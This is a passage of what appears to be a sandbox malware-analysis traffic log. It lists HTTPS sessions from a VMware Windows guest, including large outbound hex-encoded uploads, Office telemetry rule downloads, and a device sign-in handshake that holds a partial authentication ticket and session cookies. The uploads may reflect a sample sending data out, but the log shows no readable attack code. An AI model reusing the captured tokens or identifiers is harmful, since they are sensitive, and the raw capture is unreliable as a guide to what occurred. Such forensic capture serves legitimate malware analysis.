                                                                                                                                                                        2024-11-21 09:37:37 UTC15331OUTData Raw: 9d 87 36 1a f0 df 4d 27 6c 48 d4 2d 02 a4 2b 67 25 9f e1 cf 9e 58 73 ad 8f 16 37 d5 48 eb 69 16 22 36 05 98 7a 56 65 ed 16 88 f6 9e 6c ea 34 73 e4 d9 34 a1 b4 eb ad 2b 83 56 e1 90 f7 63 e3 98 12 52 52 a6 ba 00 10 62 5d 10 23 b9 6d 0f 1b 16 bc 59 b1 71 08 8f da 19 87 bb 40 ee 3b 20 0e e1 23 7a 1a c8 c1 53 6b 3d 12 11 9e f1 ef 5f e9 17 35 85 1e 10 ce 1a e7 4f f5 d1 2f 88 f9 b6 11 8e fb 76 f8 7e e8 cc 07 35 51 de 43 e2 ff ef b4 6b b0 09 a8 a1 18 10 a3 87 4a 85 c2 33 8e 83 cc 88 fa 8f 00 ae bf 00 ab b3 a4 ea 7e 4f 9c 3f 10 cb 30 32 72 29 9c 0a 82 e3 36 1d 53 a3 c3 47 32 36 5f 58 3f e2 e9 30 a3 7f 5f 11 43 c1 dd c3 d9 20 c9 8b ac 87 5a a9 36 83 4d d5 88 ee a9 6b b8 fd 99 01 d8 f4 77 46 7d 62 e5 62 a8 90 20 2c 09 be 59 ea db e3 ea ca 39 00 4a 3a 12 19 ed 4d b7
                                                                                                                                                                        Data Ascii: 6M'lH-+g%Xs7Hi"6zVel4s4+VcRRb]#mYq@; #zSk=_5O/v~5QCkJ3~O?02r)6SG26_X?0_C Z6MkwF}bb ,Y9J:M
                                                                                                                                                                        2024-11-21 09:37:37 UTC15331OUTData Raw: 69 fc c6 d4 fb ca 69 1a 08 0b 55 21 81 05 fb cc ee 7e ed 96 c1 df 9d 19 1b e6 da 65 fb 3b 4d 6a f5 fb f3 c3 76 dc a1 1d ac 7f 5e ca 14 09 54 20 d1 7c 0f 07 38 b1 d5 bf b1 4c 5f 6a 33 57 73 94 cf 6e 8a 14 a1 1a 89 87 a8 c2 af 88 bd 7c b9 79 86 b5 a4 5a fd 8b f8 17 b3 d5 15 41 9a c6 2f e2 b1 69 0a 77 e0 0c 19 98 8f 33 9f fc 0d 38 24 4e 8f 18 55 fd c0 c6 8c f5 4e ec 97 c7 d4 57 36 f8 16 32 84 4e 57 1d 74 d8 64 ec 0b 6c 09 a0 1c 8b 7c 9f 2a 1e 55 5f 8d 96 8d 22 15 7c 71 b4 db 53 2b fd de ec 5e f0 93 41 54 d3 f3 f5 9a 95 b6 5c 61 cf f9 3c 43 d8 70 cf ef d9 c2 da d4 27 d4 ee 0f 84 a9 6f 85 22 ce 80 3c bd 4d 1b d1 b7 fd a0 1f ba b6 fa 43 54 61 a8 78 4f 7d e5 26 67 f3 50 21 d6 54 88 2c 2c e8 7b cf 74 3e 0c 26 9b 85 9d 97 1d f9 7e 18 23 27 45 fc 55 5c 88 3a 72 21
                                                                                                                                                                        Data Ascii: iiU!~e;Mjv^T |8L_j3Wsn|yZA/iw38$NUNW62NWtdl|*U_"|qS+^AT\a<Cp'o"<MCTaxO}&gP!T,,{t>&~#'EU\:r!
                                                                                                                                                                        2024-11-21 09:37:37 UTC15331OUTData Raw: 33 b0 d7 4e 49 5f 51 b9 79 95 c8 77 2c e0 75 94 ca 7f 02 35 bd a7 0f 3a 94 07 97 5b 6f 3d 51 b0 98 d5 8d f2 8b 7b 1e a8 73 c4 fa c8 25 f7 ae 1f 25 67 ff a0 6a 9e 07 ec d8 38 13 3f 29 26 ed c1 a6 3c c7 85 9f cf 0f 7e 3b c0 2a b3 d1 ed e8 eb 7c 78 7d 30 a4 6e bc 38 b5 63 3f 39 d7 99 7b dd f2 ba 43 d7 d9 7c cd 82 b4 36 66 ef cf fc 73 1d 9d b1 b2 83 7b 2f 2c f5 2d ac bc 55 77 cc a1 fe d9 1f 76 5e cb 1c 44 3c 3e 07 f1 49 42 b5 15 be df bd 76 7c f0 64 9c 4f 77 de c3 97 9c d5 d0 95 3a 75 62 25 df 68 ff df f4 c1 44 da c0 c3 49 e7 db 35 39 7f 85 2d 74 45 75 35 48 5d 0a 5b 58 2f b9 81 42 85 b4 8e a5 e5 e4 36 8c a5 ae bc a5 ad da 58 b8 2e 18 fe 8c 4d cb 68 b8 d2 12 74 84 24 56 57 f3 95 fa 27 ca ed ed c2 44 56 fb 66 d6 8f ad ac ad c7 53 57 6c 8a 04 6c ce 18 de a1 29
                                                                                                                                                                        Data Ascii: 3NI_Qyw,u5:[o=Q{s%%gj8?)&<~;*|x}0n8c?9{C|6fs{/,-Uwv^D<>IBv|dOw:ub%hDI59-tEu5H][X/B6X.Mht$VW'DVfSWll)
                                                                                                                                                                        2024-11-21 09:37:37 UTC15331OUTData Raw: 7e bb d0 79 17 5b f7 51 f0 72 3e 95 4a 9a 0c c0 3f 91 87 db e7 3c 45 9b 03 cf 0c af c6 30 8e e1 5b 16 44 0d f8 d7 bf f7 20 77 83 99 05 e5 16 ba 20 26 25 a9 de 60 51 3b 1e d6 c4 78 4e 49 e7 b0 df 31 95 51 e6 58 e6 76 6c 67 b7 b6 1b 0c 47 84 3f d1 6d 37 e2 4b 70 3f ed f4 a6 f3 d5 c0 0e 84 6b 3f 42 db b3 5d 9b b3 db 44 1e 91 a6 bf 9e 15 95 db 88 c3 a3 04 57 f0 c0 cf 1c cf f6 39 e0 3c 54 3e cf 21 8f bc 2f 65 13 20 07 12 fb 6e 34 75 b9 34 60 17 cd e1 5e 42 e5 2f 89 f7 62 33 2f da 2d eb cf 10 64 2e 06 20 93 eb 16 c6 21 51 32 ef 2c 8b 3b 05 dd d8 78 36 92 4c a4 c8 6d 38 96 e4 cd 7b 08 f1 4f 24 d5 ed c7 e7 cf 7b b6 89 ca 2b 81 84 d5 d9 fe 66 dd b4 a6 9e 4b 40 4f c9 4c 27 fd 82 fe eb 7d fa 9a ad af 16 69 ca 95 e8 8f 47 5e 94 e0 80 4c 46 44 9d 14 3e 16 33 57 28 6c
                                                                                                                                                                        Data Ascii: ~y[Qr>J?<E0[D w &%`Q;xNI1QXvlgG?m7Kp?k?B]DW9<T>!/e n4u4`^B/b3/-d. !Q2,;x6Lm8{O${+fK@OL'}iG^LFD>3W(l
                                                                                                                                                                        2024-11-21 09:37:37 UTC15331OUTData Raw: c4 57 1d 93 43 f7 24 8c 31 8a 01 62 d1 26 05 4e 1a 24 04 5a c1 ca 30 eb 1e 6f 4c c6 6c fd b6 c5 77 7d 83 8d ab ed 36 e3 a9 e2 39 9c d6 87 8a ff f6 85 cf 6a 97 f1 c4 79 6a 73 31 72 29 d3 2c 4c 6c c6 80 4d 0e dd 33 67 26 b7 1f 4d 22 6d a4 2d 21 bf a1 45 7e 19 56 86 64 9f c9 84 e1 34 ac cc 28 34 ba d7 0c b1 56 93 da 42 e6 12 cb 8f ff 89 0e 23 60 85 e2 94 42 a1 84 0a 81 66 bd 21 93 8a 0f 32 da 56 f6 b8 6e 9b 2e c5 61 c5 6c 68 45 13 ec 30 e9 28 c0 c6 ec bb a8 59 ca 0b 08 22 67 46 05 dd 25 8f b0 5e 30 ac 38 d9 46 9b 12 5b ab 37 67 28 26 5b c0 dc c0 d8 bf 0e a7 02 1e 7d 11 65 88 22 54 d4 82 74 0b da 46 40 71 f7 7d 3b dc d2 7c 10 45 45 e8 03 b6 63 4f 09 f6 5a c6 6c 7c 0f 93 94 ad 2c 75 9d a6 b0 c8 7f f9 20 a5 b0 03 6d af 8d 05 f3 85 a5 7c 3c 94 cb d0 4b 06 db c6
                                                                                                                                                                        Data Ascii: WC$1b&N$Z0oLlw}69jyjs1r),LlM3g&M"m-!E~Vd4(4VB#`Bf!2Vn.alhE0(Y"gF%^08F[7g(&[}e"TtF@q};|EEcOZl|,u m|<K
                                                                                                                                                                        2024-11-21 09:37:37 UTC15331OUTData Raw: 58 78 e1 c8 15 4e 98 62 32 91 ea 0d a0 41 63 2a 5b 8d 88 c0 eb ef c4 9d 2d 42 6e 7e f4 6f a6 ee e1 03 ca 7f 67 7d 73 78 b9 f9 43 34 72 6a 34 0e fb f1 00 db e3 11 ca c8 af f8 fc ee a8 3d 6a ba 70 b9 7d 49 ff 31 57 92 5a 60 4a 08 72 8e 24 e5 a0 1b be e5 20 43 d1 07 88 70 1b c9 c2 25 f1 b4 0f 20 a2 6f 8e 50 06 d3 c1 60 5b 15 10 37 38 40 a1 41 49 4a 2b 6b 3f f8 ab 4f 7d ad bd 85 de 54 a0 52 2f 01 b5 13 11 ab fe 23 d8 dd 75 2c d6 da 0f 5c 01 68 14 de 15 c0 91 ee 48 ed 71 d0 79 18 7b 22 b8 4b 5c ec 4d d5 b6 12 3b 36 e8 22 0a ff 22 46 07 08 22 11 36 6a 59 40 ed 08 af b3 6a f4 dd 18 d6 63 c9 4d 9b c8 b0 92 7d 22 d9 7c 35 1f 01 ef c8 51 fd 37 67 39 0f e3 e1 5b 7b 8d 74 b8 de 34 78 1d 90 7e 6d 64 98 8c 60 d7 e7 f4 cc f9 3e 74 7e f2 1e b3 4c 1c c0 f5 07 8f 70 fe ef
                                                                                                                                                                        Data Ascii: XxNb2Ac*[-Bn~og}sxC4rj4=jp}I1WZ`Jr$ Cp% oP`[78@AIJ+k?O}TR/#u,\hHqy{"K\M;6""F"6jY@jcM}"|5Q7g9[{t4x~md`>t~Lp
                                                                                                                                                                        2024-11-21 09:37:41 UTC992INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:37:40 GMT
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Set-Cookie: PHPSESSID=rrbhfkqrfostbdie3heutoojaf; expires=Mon, 17-Mar-2025 03:24:18 GMT; Max-Age=9999999; path=/
                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BvTVoBtvrVs%2Bqkxof1tskYpaBgPlKZMvhZpqptDHcPpuS%2FLBvuIB0qi4H%2B3tRaQFGo7sPRdK%2BWqDUbBmA%2BneB4KyzDbWWmPDjmevUSoocC4sKzhZdlAh4j1VHIQqqRoS"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                        CF-RAY: 8e5fb3c0aae90f83-EWR
                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1754&sent=337&recv=588&lost=0&retrans=0&sent_bytes=2828&recv_bytes=569988&delivery_rate=1657207&cwnd=219&unsent_bytes=0&cid=375b7b3c86f480c5&ts=3972&x=0"


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        54192.168.2.64976513.107.246.60443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:37:37 UTC192OUTGET /rules/rule120644v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-21 09:37:37 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:37:37 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 479
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                                                                                        ETag: "0x8DC582BB7D702D0"
                                                                                                                                                                        x-ms-request-id: 171ae584-101e-005a-6763-3b882b000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241121T093737Z-178bfbc474bp8mkvhC1NYCzqnn000000011g00000000brqg
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-21 09:37:37 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120644" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        55192.168.2.64976713.107.246.60443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:37:37 UTC192OUTGET /rules/rule120645v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-21 09:37:38 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:37:38 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 425
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                                                                                                        ETag: "0x8DC582BBA25094F"
                                                                                                                                                                        x-ms-request-id: c2180679-501e-008f-16bc-3b9054000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241121T093738Z-178bfbc474bkvpdnhC1NYCuu2w000000019g00000000bh1s
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-21 09:37:38 UTC425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 4d 6d 5d 5b 41 61 5d 5b 5a 7a 5d 5b 4f 6f 5d 5b 4e 6e 5d 20 5b 45 65 5d 5b 43 63 5d 32 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120645" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <SR T="2" R="([Aa][Mm][Aa][Zz][Oo][Nn] [Ee][Cc]2)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I=


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        56192.168.2.64976813.107.246.60443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:37:37 UTC192OUTGET /rules/rule120646v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-21 09:37:38 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:37:38 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 475
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                                                                                        ETag: "0x8DC582BB2BE84FD"
                                                                                                                                                                        x-ms-request-id: 7511d71d-801e-0083-6e8c-3af0ae000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241121T093738Z-1777c6cb754ww792hC1TEBzqu40000000as00000000089kh
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-21 09:37:38 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120646" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        57192.168.2.64976913.107.246.60443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:37:37 UTC192OUTGET /rules/rule120647v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-21 09:37:38 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:37:38 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 448
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                        ETag: "0x8DC582BB389F49B"
                                                                                                                                                                        x-ms-request-id: 2250be27-501e-007b-7961-3b5ba2000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241121T093738Z-178bfbc474bvjk8shC1NYC83ns000000012g00000000avcg
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-21 09:37:38 UTC448INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 50 70 5d 5b 41 61 5d 5b 43 63 5d 5b 48 68 5d 5b 45 65 5d 20 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120647" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <SR T="2" R="([Aa][Pp][Aa][Cc][Hh][Ee] [Ss][Oo][Ff][Tt][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR>


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        58192.168.2.64977040.113.110.67443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:37:38 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 50 6d 7a 5a 47 47 6f 7a 6a 55 71 64 2f 32 52 6e 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 34 62 36 34 31 39 64 37 31 61 38 34 64 32 39 63 0d 0a 0d 0a
                                                                                                                                                                        Data Ascii: CNT 1 CON 305MS-CV: PmzZGGozjUqd/2Rn.1Context: 4b6419d71a84d29c
                                                                                                                                                                        2024-11-21 09:37:38 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                                                        Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                                                                        2024-11-21 09:37:38 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 50 6d 7a 5a 47 47 6f 7a 6a 55 71 64 2f 32 52 6e 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 34 62 36 34 31 39 64 37 31 61 38 34 64 32 39 63 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 58 6f 4a 67 77 33 78 62 6a 73 61 31 2b 45 45 5a 34 43 58 6d 57 77 51 41 64 6a 45 56 34 6b 49 75 52 78 36 36 73 4d 52 6e 39 74 6d 58 46 31 73 70 4d 7a 31 33 6d 59 43 63 55 68 6e 57 5a 6f 41 5a 30 37 58 31 39 6f 75 44 71 2f 6d 71 63 38 69 4b 61 55 4d 31 67 55 34 7a 35 70 71 47 76 54 39 50 37 58 4d 58 43 53 4e 74 75 70 6d 72 53
                                                                                                                                                                        Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: PmzZGGozjUqd/2Rn.2Context: 4b6419d71a84d29c<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAXoJgw3xbjsa1+EEZ4CXmWwQAdjEV4kIuRx66sMRn9tmXF1spMz13mYCcUhnWZoAZ07X19ouDq/mqc8iKaUM1gU4z5pqGvT9P7XMXCSNtupmrS
                                                                                                                                                                        2024-11-21 09:37:38 UTC74OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 35 36 0d 0a 4d 53 2d 43 56 3a 20 50 6d 7a 5a 47 47 6f 7a 6a 55 71 64 2f 32 52 6e 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 34 62 36 34 31 39 64 37 31 61 38 34 64 32 39 63 0d 0a 0d 0a
                                                                                                                                                                        Data Ascii: BND 3 CON\QOS 56MS-CV: PmzZGGozjUqd/2Rn.3Context: 4b6419d71a84d29c
                                                                                                                                                                        2024-11-21 09:37:38 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                                        Data Ascii: 202 1 CON 58
                                                                                                                                                                        2024-11-21 09:37:38 UTC58INData Raw: 4d 53 2d 43 56 3a 20 41 34 61 51 63 58 4f 63 4e 55 79 41 4c 4c 55 38 54 34 4b 2f 6d 77 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                                        Data Ascii: MS-CV: A4aQcXOcNUyALLU8T4K/mw.0Payload parsing failed.


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        59192.168.2.64977113.107.246.60443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:37:38 UTC192OUTGET /rules/rule120648v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-21 09:37:39 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:37:39 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 491
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                        ETag: "0x8DC582B98B88612"
                                                                                                                                                                        x-ms-request-id: e456cfdf-c01e-0014-248c-3aa6a3000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241121T093739Z-1777c6cb754g9zd5hC1TEBfvpw0000000axg00000000hs6e
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
